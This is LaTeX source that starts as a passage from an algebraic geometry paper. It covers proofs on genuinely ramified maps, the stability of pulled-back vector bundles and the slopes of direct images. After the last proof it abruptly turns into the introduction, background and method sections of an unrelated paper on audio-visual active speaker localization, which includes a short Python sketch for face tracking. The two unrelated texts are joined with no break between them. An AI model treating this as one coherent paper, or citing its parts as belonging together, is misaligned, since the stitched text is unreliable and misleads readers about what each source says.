\item the quotient $({\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X))/{\mathcal W}$ is torsionfree
\end{enumerate}
must be of the form $${\mathcal O}_X\otimes W\, \subset\,{\mathcal O}_X\otimes H^0_{\mathbb F}(X,\,
f^*f_*{\mathcal O}_X)$$
for some subspace $$W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X).$$ Indeed, this follows from the
fact that $\text{degree}({\mathcal W})$ is a nonzero multiple of the degree of the pullback of the tautological bundle
by the rational map from $X$ to the Grassmannian corresponding to ${\mathcal W}$; if ${\rm rank}({\mathcal W})\,=\, a$, then
${\mathcal W}$ is given by a rational map from $X$ to the Grassmannian parametrizing $a$-dimensional subspaces of $k^{\oplus n}$ (this map is defined on the open subset over which $\mathcal W$ is a subbundle of ${\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$). Therefore, from the given two conditions on ${\mathcal W}$ it follows that it is of the form ${\mathcal O}_X\otimes W$ for some subspace
$W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$. For the homomorphism $\varphi$ in
\eqref{g1} if ${\rm kernel}(\varphi)\, \not=\, 0$, then $\text{degree}({\rm kernel}(\varphi))\,=\, 0$; this follows from \eqref{g2} and the fact that ${\rm degree}({\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)) \,=\,0$ (these two together imply that the image of $\varphi$ lies in the
maximal semistable subsheaf of $(f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}$).
Also, the quotient $({\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X))/{\rm kernel}(\varphi)$ is torsionfree, because it is contained in $(f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}$. Therefore, from the earlier observation we conclude that ${\rm kernel}(\varphi)$
is of the form ${\mathcal O}_X\otimes W\, \subset\,{\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$ for some subspace $W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$. From this it follows that the evaluation map on any $w\, \in\, W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$ is identically zero. But this implies that $w\,=\, 0$. Therefore, we conclude that
$W\,=\, 0$, and the homomorphism $\varphi$ in \eqref{g1} is injective.
Let
\begin{equation}\label{es}
{\mathcal S}\,:=\, {\rm image}(\varphi)\, \subset\, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}
\end{equation}
be the image of $\varphi$. Since $\varphi$ is injective, we conclude that
${\mathcal S}$ is isomorphic to ${\mathcal O}^{\oplus n}_X$ (see \eqref{em}). The pullback $g^*{\mathcal S}$
by the map $g$ in \eqref{eg} is free (equivalently, it is a trivial bundle)
because ${\mathcal S}$ is so. The pulled back homomorphism
$$
g^*\varphi\, :\, g^*{\mathcal S}\, \longrightarrow\,
(g^*f^*f_*{\mathcal O}_X)/(g^*f^*f_*{\mathcal O}_X)_{\rm tor}\,=\,
(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}
$$
is injective because $\varphi$ is injective and $\mathcal S$ is free (equivalently,
a trivial bundle). Using $g^*\varphi$ we will consider $g^*{\mathcal S}$
as a subsheaf of $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$.
The Galois group $\Gamma\,=\, {\rm Gal}(\widehat{f})$ has a natural action on $\widehat{f}^*f_*{\mathcal O}_X$
because this sheaf is pulled back from $Y$. This action of $\Gamma$ on
$\widehat{f}^*f_*{\mathcal O}_X$ produces an action of $\Gamma$ on the torsionfree quotient
$(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$.
Consider ${\mathcal Z}$ defined in \eqref{cz} together with the projections $p'_1$ and $p'_2$ from it in
\eqref{pi}. Both $(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ are free because $\mathcal S$
is so. The natural isomorphism
$$
(p'_1)^*f^*f_*{\mathcal O}_X \, \stackrel{\sim}{\longrightarrow}\, (p'_2)^*f^*f_*{\mathcal O}_X,
$$
given by the fact that they are the pull backs of a single sheaf on $Y$, produces an isomorphism
\begin{equation}\label{it2}
((p'_1)^*f^*f_*{\mathcal O}_X)/((p'_1)^*f^*f_*{\mathcal O}_X)_{\rm tor} \, \stackrel{\sim}{\longrightarrow}\,
((p'_2)^*f^*f_*{\mathcal O}_X)/((p'_2)^*f^*f_*{\mathcal O}_X)_{\rm tor}\,.
\end{equation}
It can be shown that the isomorphism in \eqref{it2} takes the subsheaf
$$
(p'_1)^*{\mathcal S}\,\subset\, ((p'_1)^*f^*f_*
{\mathcal O}_X)/((p'_1)^*f^*f_*{\mathcal O}_X)_{\rm tor},
$$
where $\mathcal S$ is defined in \eqref{es}, to the subsheaf
$$
(p'_2)^*{\mathcal S}\, \subset\,((p'_2)^*f^*f_*{\mathcal O}_X)/((p'_2)^*f^*f_*{\mathcal O}_X)_{\rm tor}.
$$
Indeed, we have
$$
H^0(X,\, (p'_{1})_* {\mathcal O}_{\mathcal Z})\,=\, H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})\,=\,
H^0(X,\, (p'_{2})_* {\mathcal O}_{\mathcal Z})
$$
(because $p'_1$ and $p'_2$ are finite maps), and therefore from \eqref{eq_torsion_reduced} it follows that both
$(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ coincide with
${\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$.
The isomorphism in \eqref{it2} takes the subsheaf $(p'_1)^*{\mathcal S}$ to $(p'_2)^*{\mathcal S}$,
and the homomorphism $(p'_1)^*{\mathcal S}\,{\longrightarrow}\,(p'_2)^*{\mathcal S}$ given by the
isomorphism in \eqref{it2} coincides with the following automorphism of ${\mathcal O}_{\mathcal Z}
\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$ (after we
identify $(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ with
${\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$): The involution
$(x,\, y)\, \longmapsto\, (y,\, x)$
of $X\times_Y X$ produces an involution of ${\mathcal Z}\, =\, (X\times_Y X)_{\rm red}$. This
involution of ${\mathcal Z}$ in turn produces an involution
$$
\delta\, :\, H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z}) \,{\longrightarrow}\,
H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})\, .
$$
Define the automorphism
$$
{\rm Id}\otimes\delta\, :\, {\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})
\, \longrightarrow\, {\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})\, .
$$
The homomorphism $(p'_1)^*{\mathcal S}\,{\longrightarrow}\,(p'_2)^*{\mathcal S}$ given by the
isomorphism in \eqref{it2} coincides with the automorphism ${\rm Id}\otimes\delta$ of ${\mathcal O}_{\mathcal Z}
\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$, after we
identify $(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ with
${\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$.
Using the above observation that the isomorphism in \eqref{it2} takes the subsheaf $(p'_1)^*{\mathcal S}$
to $(p'_2)^*{\mathcal S}$ we will now show that the natural action
of the Galois group $\Gamma\,=\, {\rm Gal}(\widehat{f})$ on $(\widehat{f}^*f_*{\mathcal O}_X)/
(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ preserves the subsheaf $g^*{\mathcal S}$, where $g$
is the map in \eqref{eg}; it was noted earlier
that $\Gamma$ acts on $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$.
To prove that the action of $\Gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)/
(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ preserves $g^*{\mathcal S}$, let $Y_0\, \subset\,
Y$ be the largest open subset such that
\begin{itemize}
\item the map $f$ is flat over $Y_0$, and
\item the map $g$ is flat over $f^{-1}(Y_0)$.
\end{itemize}
Define $X_0\, :=\, f^{-1}(Y_0)$ and $M_0\,:=\, \widehat{f}^{-1}(X_0)$. The conditions on $Y_0$
imply that the restriction of $\widehat f$ to
$M_0$ is flat \cite[Ch~III, \S~9]{Ha}. In view of the descent criterion for sheaves under flat
morphisms, \cite{Gr}, \cite{Vi},
the above observation, that the isomorphism in \eqref{it2} takes the subsheaf
$(p'_1)^*{\mathcal S}$ to the subsheaf $(p'_2)^*{\mathcal S}$, implies that the restriction
${\mathcal S}\big\vert_{X_0}$ descends to a subsheaf of $(f_*{\mathcal O}_X)\big\vert_{Y_0}$.
Consequently, the action of $\Gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)\big\vert_{M_0}$ preserves
$(g^*{\mathcal S})\big\vert_{M_0}$ (as it is the pullback of a
sheaf on $Y_0$); note that $\widehat{f}^*f_*{\mathcal O}_X$ is torsionfree over $M_0$ because
the map $\widehat f$ is flat over $M_0$. The codimension of the complement $M\setminus M_0$ is at least
two. Therefore, given two vector bundles $A$ and $B$ on $M$ together with an isomorphism
$${\mathcal I}\, :\, A\big\vert_{M_0} \, \stackrel{\sim}{\longrightarrow}\, B\big\vert_{M_0}$$ over $M_0$, there
is a unique isomorphism
$$\widetilde{\mathcal I}\, :\, A \, \stackrel{\sim}{\longrightarrow}\, B$$
that restricts to ${\mathcal I}$ on $M_0$; recall that $M$ is normal. For any $\gamma\, \in\, \Gamma$,
set $g^*{\mathcal S}\,=\, A\,=\, B$ and ${\mathcal I}$ to be the action of $\gamma$ on
$(g^*{\mathcal S})\big\vert_{M_0}$; recall that $g^*{\mathcal S}$ is locally free and
the action of $\Gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)\big\vert_{M_0}$ preserves
$(g^*{\mathcal S})\big\vert_{M_0}$. Now from the above observation that $\mathcal I$ extends uniquely
to $M$ we conclude that the action of $\gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)
/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ preserves the subsheaf $g^*{\mathcal S}$.
{}From the above observation that $g^*{\mathcal S}$ is preserved by the natural action of $\Gamma$ on
$(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ we will now
deduce that there is a locally free subsheaf
$$
V\, \subset\, f_*{\mathcal O}_X
$$
such that the image of $\widehat{f}^*V$ in $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm
tor}$ coincides with the image of $g^*{\mathcal S}$ in $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal
O}_X)_{\rm tor}$.
To prove this, consider the free sheaf
$$
{\mathcal O}_M\otimes H^0(M,\, g^*{\mathcal S})\, \longrightarrow\, M\, ;
$$
it corresponds to the trivial vector bundle on $M$ with fiber $H^0(M,\, g^*{\mathcal S})$. Let
\begin{equation}\label{ei}
\Phi\, :\, {\mathcal O}_M\otimes H^0(M,\, g^*{\mathcal S})\, \longrightarrow\, g^*{\mathcal S}
\end{equation}
be the evaluation map. This $\Phi$ is an isomorphism, because $g^*{\mathcal S}$ is free, or equivalently,
it is a trivial vector bundle (recall that ${\mathcal S}$ is free).
The action of $\Gamma$ on $g^*{\mathcal S}$ produces an action of $\Gamma$ on $H^0(M,\,
g^*{\mathcal S})$ which, coupled with the action of $\Gamma$ on $M$, produces an action of $\Gamma$ on
${\mathcal O}_M\otimes H^0(M,\, g^*{\mathcal S})$. The isomorphism $\Phi$
in \eqref{ei} is evidently $\Gamma$--equivariant for the actions of $\Gamma$.
Let
\begin{equation}\label{ga0}
\Gamma_0\, \subset\, \Gamma
\end{equation}
be the normal subgroup that acts trivially on the vector space $H^0(M,\, g^*{\mathcal S})$. Now using
$\Phi$ we conclude that $g^*{\mathcal S}$ descends to a vector bundle on the quotient $M/\Gamma_0$. Let
\begin{equation}\label{ga1}
{\mathcal S}_1\, \longrightarrow\, M/\Gamma_0
\end{equation}
be the descent of $g^*{\mathcal S}$. In other words, the pullback of ${\mathcal S}_1$ to $M$ has a
$\Gamma_0$--equivariant isomorphism with $g^*{\mathcal S}$. Note that ${\mathcal O}_M\otimes H^0(M,\,
g^*{\mathcal S})$ descends to ${\mathcal O}_{M/\Gamma_0}\otimes H^0(M,\, g^*{\mathcal S})$ on $M/\Gamma_0$,
because $\Gamma_0$ acts trivially on $H^0(M,\, g^*{\mathcal S})$, and
hence ${\mathcal S}_1$ is a trivial vector bundle.
For the action of $\Gamma$ on $M$, the isotropy subgroup $\Gamma_m\, \subset\, \Gamma$ of any point $m\,\in\, M$
is actually contained in the subgroup $\Gamma_0$ in \eqref{ga0}. Indeed, this follows immediately from the fact that
$\Gamma_m$ acts trivially on the fiber of $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$
over $m$; recall that $\mathcal S$ is the image of the injective map $\varphi$ from a trivial vector bundle
(see \eqref{g1} and \eqref{es}). Consequently, the natural map
$$
M/\Gamma_0\, \longrightarrow\, Y
$$
given by $\widehat{f}$ is actually \'etale Galois with Galois group $\Gamma/\Gamma_0$. The
action of $\Gamma$ on $g^*{\mathcal S}$ produces an action of $\Gamma/\Gamma_0$ on ${\mathcal S}_1$ in \eqref{ga1};
it is a lift of the action of $\Gamma/\Gamma_0$ on $M/\Gamma_0$. Hence ${\mathcal S}_1$ descends to
a vector bundle ${\mathcal S}_2$ on $Y$.
We have ${\mathcal S}_2\, \subset\, {\mathbb S}$, where ${\mathbb S}$ is constructed in \eqref{e3}, and
also $${\rm rank}({\mathcal S}_2)\,=\, {\rm rank}({\mathcal S})\,=\, n\, \geq\, 2$$ (see \eqref{em}).
Hence the statement (5) in the theorem fails. Therefore,
the statement (5) implies the statement (4). This completes the proof.
\end{proof}
\begin{theorem}\label{thm2}
Let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable surjective map between irreducible normal
projective varieties such that $f$ is genuinely ramified. Let $E$ be a stable vector bundle on
$Y$. Then the pulled back vector bundle $f^*E$ is also stable.
\end{theorem}
\begin{proof}
In view of Theorem \ref{thm1}, the proof is identical to the proof of Theorem 1.1
of \cite{BP1}. The only point to note is that in Proposition 3.5 of \cite{BP1} the sheaves
${\mathcal L}_i$ are no longer locally free; they are now sheaves properly contained in
${\mathcal O}_X$. But this does not affect the arguments. We omit the details.
\end{proof}
\section{A characterization of stable pullbacks}
\begin{lemma}\label{lem3}
Let $f\, \colon \, X\, \longrightarrow\, Y$ be a separable finite surjective map
of irreducible normal
projective varieties. Let $E$ be a semistable vector bundle on $X$. Then
$$
\mu_{\rm max}(f_*E)\, \leq\, \frac{1}{{\rm degree}(f)}\cdot\mu(E)\, .
$$
\end{lemma}
\begin{proof}
Let $F\, \subset\, f_*E$ be the first nonzero term of the Harder-Narasimhan filtration of $f_*E$,
so $$\mu_1\, :=\, \mu_{\rm max}(f_*E)\,=\, \mu(F).$$ Therefore,
$(f^*F)/(f^*F)_{\rm tor}$ is semistable \cite[Remark 2.1]{BP1}, and
$$
\mu((f^*F)/(f^*F)_{\rm tor})\,=\, {\rm degree}(f)\cdot\mu_1\,.
$$
The inclusion map $F\, \hookrightarrow\, f_*E$ gives a homomorphism $f^*F\, \longrightarrow\, E$
(see \eqref{eq_adjoint}), which in turn produces a homomorphism
$$
\beta\, :\, (f^*F)/(f^*F)_{\rm tor}\, \longrightarrow\, E.
$$
Since $\beta\, \not=\, 0$, and both $E$ and $(f^*F)/(f^*F)_{\rm tor}$ are
semistable, we have
$$
\mu(E)\, \geq\, \mu({\rm image}(\beta))
\, \geq\, \mu((f^*F)/(f^*F)_{\rm tor})\,=\, {\rm degree}(f)\cdot\mu_1.
$$
This proves the lemma.
\end{proof}
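As a consistency check, Lemma \ref{lem3} recovers the equality \eqref{e2}.

\begin{remark}
Setting $E\,=\, {\mathcal O}_X$ in Lemma \ref{lem3} gives
$$
\mu_{\rm max}(f_*{\mathcal O}_X)\, \leq\, \frac{1}{{\rm degree}(f)}\cdot\mu({\mathcal O}_X)\,=\,0\, ,
$$
while the inclusion ${\mathcal O}_Y\, \hookrightarrow\, f_*{\mathcal O}_X$ in \eqref{e0}
gives $\mu_{\rm max}(f_*{\mathcal O}_X)\, \geq\, 0$. Together these recover \eqref{e2};
note that the proof of Lemma \ref{lem3} does not use \eqref{e2}, so there is no circularity.
\end{remark}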
\begin{theorem}\label{thm3}
Let $f\, \colon \, X\, \longrightarrow\, Y$ be a genuinely ramified map of irreducible normal
projective varieties. Let $E$ be a stable vector bundle on $X$. Then there is a vector
bundle $W$ on $Y$ with
$f^*W$ isomorphic to $E$ if and only if $f_*E$ contains a stable vector bundle $F$ such that
$$
\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)\,.
$$
\end{theorem}
\begin{proof}
First assume that there is a vector bundle $W$ on $Y$ such that $f^*W$ is isomorphic to $E$.
It can be shown that $W$ is stable. Indeed, if
$$
S\, \subset\, W
$$
is a nonzero coherent subsheaf such that ${\rm rank}(W/S)\, >\, 0$
and $\mu(S)\, \geq\, \mu(W)$, then we have ${\rm rank}((f^*W)/(f^*S))\, >\, 0$
and $$\mu(f^*S)\,=\, \mu(S)\cdot {\rm degree}(f)\, \geq\, \mu(W)\cdot {\rm degree}(f)
\,=\, \mu(f^*W),$$
which contradicts the stability condition for $f^*W\,=\, E$.
Using the given condition $f^*W\,=\, E$, and the projection formula, we have
$$f_*E\,=\, f_*f^* W \,=\, W\otimes f_*{\mathcal O}_X.$$ Since ${\mathcal O}_Y\, \subset\,
f_*{\mathcal O}_X$ (see \eqref{e0}), we have
$$
W\, \subset\, W\otimes f_*{\mathcal O}_X\,=\, f_*E\, .
$$
Note that
$$
\mu(W)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)\,.
$$
To prove the converse, assume that $f_*E$ contains a stable vector bundle $F$ such that
$$
\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)\,.
$$
Then $f^*F$ is stable by Theorem \ref{thm2}.
Let
$$
h\,:\, f^*F\, \longrightarrow\, E
$$
be the natural homomorphism; this $h$ is given by the inclusion map $F\, \hookrightarrow\, f_*E$
using the isomorphism in \eqref{eq_adjoint}. Since
\begin{enumerate}
\item both $f^*F$ and $E$ are stable,
\item $\mu(E)\,=\, {\rm degree}(f)\cdot \mu(F)\,=\, \mu(f^*F)$, and
\item $h\, \not=\, 0$,
\end{enumerate}
we conclude that $h$ is an isomorphism.
\end{proof}
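For illustration (an aside, restricted to the case of smooth projective curves, where $\mu(E)\,=\, \deg(E)/{\rm rank}(E)$ and $\deg(f^*W)\,=\, {\rm degree}(f)\cdot \deg(W)$), the slope identity used in the proof can be checked directly:
$$
\mu(f^*W)\,=\, \frac{\deg(f^*W)}{{\rm rank}(f^*W)}\,=\,
\frac{{\rm degree}(f)\cdot \deg(W)}{{\rm rank}(W)}\,=\, {\rm degree}(f)\cdot \mu(W)\, .
$$
For instance, if ${\rm degree}(f)\,=\,2$, $\deg(W)\,=\,3$ and ${\rm rank}(W)\,=\,2$, then $\mu(W)\,=\,3/2$ while $\mu(f^*W)\,=\,3$, consistent with the condition $\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)$ of Theorem \ref{thm3} applied to $E\,=\,f^*W$ and $F\,=\,W$.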
\begin{remark}
Note that the proof of Theorem \ref{thm3} shows the following. Let $f\, \colon \, X\,
\longrightarrow\, Y$ be a finite surjective map of irreducible normal projective
varieties. Let $E$ be a stable vector bundle on $X$. If there is a vector bundle
$W$ on $Y$ with $f^*W$ isomorphic to $E$, then $f_*E$ contains a stable vector bundle
$F$ such that $\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)$.
\end{remark}
\section{Introduction}
As the human brain explores the world, it localizes objects in the environment integrating multi-modal signals into a common reference frame. Visual and auditory cues play a key role in formation of a coherent localization.
Thus, we have learned to localize audio sources, with a certain accuracy, thanks to subtle differences in the acoustic signals picked up by our auditory system, and to integrate them into our perceived model of the world.
Our ability to integrate audio and visual cues as a single percept in a common reference frame improves reliability and robustness, maintaining viable estimates when a modality is corrupted or unavailable.
Audio-visual systems for speaker detection and localization arise in applications such as speaker diarization, surveillance, camera steering and live media production.
In practice, camera and microphone sensors present different yet complementary features, e.g.: their size, cost, power consumption, field of view, temporal and spatial resolutions, robustness to changes in light and occlusions.
A good audio-visual system must be designed to take full advantage of these complementary features but also to rely on a single modality when its counterpart is missing.
This work investigates whether these systems can benefit from joint audio-visual training to gain performance when the visual input fails.
Annotating the ground truth speaker position, as is required for supervised machine learning, is expensive and time-consuming. In contrast, our semi-supervised approach uses manually-screened, automatic audio-visual `pseudo labels' to supervise the training of an audio-only network to detect and locate an active speaker.
Thus, we seek to leverage unlabeled audio-visual training data to learn how to localize an active speaker in the visual reference frame, purely from multi-channel audio signals.
The following sections present the background (\ref{bg}), the proposed approach (\ref{appr}), the experiments (\ref{exp}), the results achieved (\ref{res}), and our conclusions (\ref{concl}).
\section{Background} \label{bg}
\subsection{Self-Supervised Audio-Visual Learning}
Self-supervised audio-visual learning is a research area that is rapidly gaining interest. It provides not only multi-modal solutions to tackle traditional problems, e.g., exploiting
visual information for speech enhancement and separation \cite{Afouras18} or solving the `cocktail party' problem \cite{Ephrat:2018:Looking2Listen}, but
it has also given rise to new tasks: e.g., \cite{morgadoNIPS18} and \cite{Gao:2019:visualsound}
proposed self-supervised approaches to generate spatial audio from videos with monaural sound.
Other works exploited the co-occurrence of audio and visual events to localize and separate audio sources that were seen in the video \cite{gao2018objectSounds,Gao:2019:coseparating,zhao:2018:ECCV}.
However, these approaches require both modalities to be present, and they fail under poor lighting or visual occlusion.
In contrast, our method requires the visual modality only during training,
drawing on the student-teacher paradigm \cite{Hinton2015DistillingTheKnowledge,Aytar:2016:soundNet,Owens2016AmbientSP}.
In audio-visual learning, this paradigm exploits the natural synchronization of audio and visual signals as a bridge between modalities, enabling one modality to supervise another \cite{Owens2016AmbientSP,Aytar:2016:soundNet,Arandjelovic:2017:look}.
Closest to our work, \cite{Gan2019SelfSupervisedMV,valverde:2021:mmdistillnet,vasudevan:2020:semanticobject} adopted a student-teacher approach to detect vehicles in the visual domain using audio input.
Their models were trained with pseudo-labels obtained via pre-trained visual networks:
Gan \textit{et al.} \cite{Gan2019SelfSupervisedMV} and Rivera Valverde \textit{et al.} \cite{valverde:2021:mmdistillnet} used respectively a stereo microphone and a microphone array to estimate 2D bounding boxes, while Vasudevan \textit{et al.} \cite{vasudevan:2020:semanticobject} used binaural sound for semantic segmentation of 360° street views.
In contrast, we use a 16-channel microphone array and deal with human speakers, not cars.
Unlike continuous car noise, speech is challenging as detected faces may be actively speaking or silent.
Thus, active speaker localization combines activity detection with source localization which is a problem of major interest especially to the audio community, see for instance the Task3 of the DCASE challenge \cite{politis:2020:DCASE}.
According to Yann LeCun's definition \cite{LeCun:2019:tweet},
we use \textit{self-supervised learning} in that part of the input (visual frames \& mono audio) supervises a network fed the remainder (multi-channel audio).
Yet, it is also \textit{semi-supervised} in that a supervised teacher model, pre-trained on a labeled dataset, automatically annotates unlabeled data to train the student network \cite{Zhu:2009:semiSupervised}.
\subsection{Active Speaker Detection}
Active speaker detection (ASD) is typically tackled as a multi-modal learning problem: e.g.,
via correlation between voice activity and lip
or upper body motion \cite{Cutler:2000:lookWho,Haider:2012:towardsspeaker,Chakravarty2015WhosSA}.
The first, large, annotated dataset for ASD was introduced for the ActivityNet Challenge (Task B) at CVPR 2019: the AVA-ActiveSpeaker dataset \cite{Roth:2020:AVA}.
It has 38.5 hours of face tracks and audio extracted from movies, labeled for voice activity.
Chung \textit{et al.} won the challenge
with an audio-visual model pre-trained on audio-to-video synchronization, performing 3D convolutions \cite{Chung2019NaverAA}.
In 2020, Alcázar \textit{et al.} proposed Active Speakers in Context (ASC) \cite{Alcazar_2020_CVPR}. Instead of compute-intensive 3D convolutions or large-scale audio-visual pre-training, ASC leverages context: in assessing a face's speech activity, it looks at any other faces.
While highly-effective, these audio-visual classifiers rely on prior visual face extraction.
In practice, the speaker can be occluded or facing away from the camera, causing face extraction to fail and degrade overall system performance.
We overcome this using multi-channel audio input: at inference, the model relates voice activity to the speaker's position in the visual frame by combining deep learning with beamforming techniques to optimize the localization accuracy.
ASD can also be tackled with 'traditional' (other than deep learning) solutions. For example, Mohd Izhar \textit{et al.} \cite{izhar:2020:AVtracker} proposed a 3D audio-visual speaker tracker that combines 3D visual detections of the speaker's nose, estimated with the aid of multiple cameras, with 3D audio source detections, estimated using a microphone array and steered response power of the acoustical signal.
Here we present four original contributions: (1) a cross-modal student-teacher approach in which we train the multi-channel audio network with pseudo labels from a pre-trained audio-visual teacher network; (2) spatial feature extraction by beamforming prior to the conventional log-mel-spectrogram input to the audio network;
(3) training and evaluation with an audio-visual dataset captured with multiple co-located cameras and microphone array;
(4) substantial gain in performance by the audio-beamforming student network over all baseline audio networks and the audio-visual teacher network, halving the overall error rate. In light of the excellent results achieved, future benchmarks will also compare our solution with other state-of-the-art approaches, e.g., \cite{izhar:2020:AVtracker}.
\section{Self-Supervised Approach} \label{appr}
Our machine-learning pipeline consists of an audio-visual teacher and an audio-only student, as in Fig.\,\ref{block_diagram}.
The teacher network visually detects and tracks faces in the video, then classifies active/inactive frames with the aid of monaural (single-channel) audio.
The horizontal positions of the active faces' bounding boxes were used as pseudo labels to train the student network,
which has multi-channel audio input from a microphone array.
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/TrainingVisualSupervision_exp09.pdf}}
\caption{Block diagram of the proposed learning pipeline. The `teacher' network, composed of an audio-visual active speaker detector preceded by a face tracker, produces pseudo labels with the speaker's position at each time instance. The `student' audio network is trained to regress the speaker's horizontal position (x) from the `directional' spectrograms achieved after filtering with the spatial beamformer.}
\label{block_diagram}
\end{figure}
\begin{figure}[tb]
\centerline{\includegraphics[width=\columnwidth]{figures/rig_collage_exp04.pdf}}
\caption{(a) A photo taken from behind one of the two rigs during the dataset capture. (b) Schematic of camera (blue) and microphone (red) positions on the AVA rig.}
\label{AVArig}
\end{figure}
\subsection{Audio-Visual Speaker Dataset}
To provide audio-visual data for training and testing, spoken scenes were recorded in our studio by two twin Audio-Visual Array (AVA) rigs designed for media production.
Each AVA rig
has a 16-element microphone array and 11 cameras fixed on a flat perspex sheet,
as in Fig.\,\ref{AVArig}.
Each camera captures 2448$\times$2048p video frames at 30\,fps.
Audio is sampled at 48 kHz, 24 bits.
The microphone array has a horizontal aperture of 450\,mm
and vertical aperture of only 40\,mm, thus
prioritizing horizontal spatial resolution.
Horizontally, the microphones are log-spaced for broad frequency coverage from 500\,Hz to 8\,kHz.
Although our pipeline requires a single video feed with the microphone array, capturing multiple views allows us to extend the audio network's training via an additional task: choosing from which view we want the speaker to be localized.
Hence, we append a one-hot vector denoting the selected view to the audio input, which provides data augmentation through variations in the camera perspective.
The captured scenes are excerpts from Shakespeare's `Romeo and Juliet' played by two actors, seen in Fig.\,\ref{AVArig} (a).
Captured scenarios, 20 sequences in total of 15--40\,s duration, included monologue, dialogue and physical interaction with occlusion.
As each sequence was captured by 22 cameras in all, the dataset provided over 2.5 hours of video data.
\subsection{Teacher Network}
The teacher network has two main parts: a face tracker and an ASD classifier.
To generate the face tracks (i.e., stack of face crops), the SeetaFaceEngine2 face detector was first applied to each video frame \cite{wu2016Seeta}.
It proved effective in detecting faces in challenging conditions, such as partial occlusion or faces in profile, and fast (it processed 2448$\times$2048p frames at 10$^+$\,fps).
The per-frame detections were tracked over time based on bounding-box intersection over union (IoU) across adjacent frames.
Gaussian temporal smoothing was applied to the bounding box corners.
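The frame-to-frame association step can be sketched as follows (a minimal illustration, not the exact tracker used; the `(x1, y1, x2, y2)` box format and the 0.5 IoU threshold are assumptions, not values stated in the paper):

```python
def iou(a, b):
    """Intersection over union of two boxes in (x1, y1, x2, y2) format."""
    ix1, iy1 = max(a[0], b[0]), max(a[1], b[1])
    ix2, iy2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(0.0, ix2 - ix1) * max(0.0, iy2 - iy1)
    area_a = (a[2] - a[0]) * (a[3] - a[1])
    area_b = (b[2] - b[0]) * (b[3] - b[1])
    union = area_a + area_b - inter
    return inter / union if union > 0 else 0.0

def link_detections(prev_boxes, new_boxes, thresh=0.5):
    """Greedily extend tracks: each new box joins the previous box with the
    highest IoU above `thresh`; otherwise it starts a new track (None)."""
    links = {}
    for j, nb in enumerate(new_boxes):
        best, best_v = None, thresh
        for i, pb in enumerate(prev_boxes):
            v = iou(pb, nb)
            if v > best_v:
                best, best_v = i, v
        links[j] = best
    return links
```

Running the linker per frame yields the face tracks (stacks of crops) that feed the ASD classifier.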
For ASD, we trained the publicly-available ASC model \cite{Alcazar_2020_CVPR} on the AVA Active Speaker dataset \cite{Roth:2020:AVA}.
In \cite{Alcazar_2020_CVPR}, the \textit{i-th} frame is classified by observing the previous and following \textit{n} frames, input as a stack of 2$n$+1 frames.
Experiments on our data performed best with stacks of 5 frames ($n$\,=\,2).
Once trained, the model processed our dataset to automatically detect the active speakers.
